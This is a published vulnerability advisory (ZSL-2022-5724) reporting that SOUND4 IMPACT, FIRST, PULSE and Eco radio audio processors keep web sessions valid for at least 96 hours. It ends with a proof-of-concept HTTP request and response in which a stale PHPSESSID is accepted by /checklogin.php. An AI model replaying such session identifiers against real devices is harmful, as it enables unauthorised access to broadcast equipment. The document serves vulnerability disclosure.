SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x Insufficient Session Expiration Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: 4.1.102 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application suffers an insufficient session expiration. This occurs when the web application permits an attacker to reuse old session credentials or session IDs for authorization. Insufficient session expiration increases the device's exposure to attacks that can steal or reuse user's session identifiers. Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5724 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5724.php 26.09.2022 -- Session valid after 96 hours: POST /checklogin.php HTTP/1.1 Host: RADIO Cookie: PHPSESSID=q9rooqkl3kl20aianmveimu23q; monitor-mp3-bitrate=128; monitor-volume=1; settings_accordion_active=3; netdiagsaccordion_last=0 Content-Length: 34 Sec-Ch-Ua: "Chromium";v="105", "Not)A;Brand";v="8" Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Sec-Ch-Ua-Mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Sec-Ch-Ua-Platform: "Windows" Origin: https://RADIO Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://RADIO/linkandshare.php Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close session=q9rooqkl3kl20aianmveimu23q HTTP/1.1 200 OK Date: Sat, 03 Jan 1970 11:13:19 GMT Server: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 X-Powered-By: PHP/7.1.1 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: User-Agent Content-Length: 1 Connection: close Content-Type: text/html; charset=UTF-8 0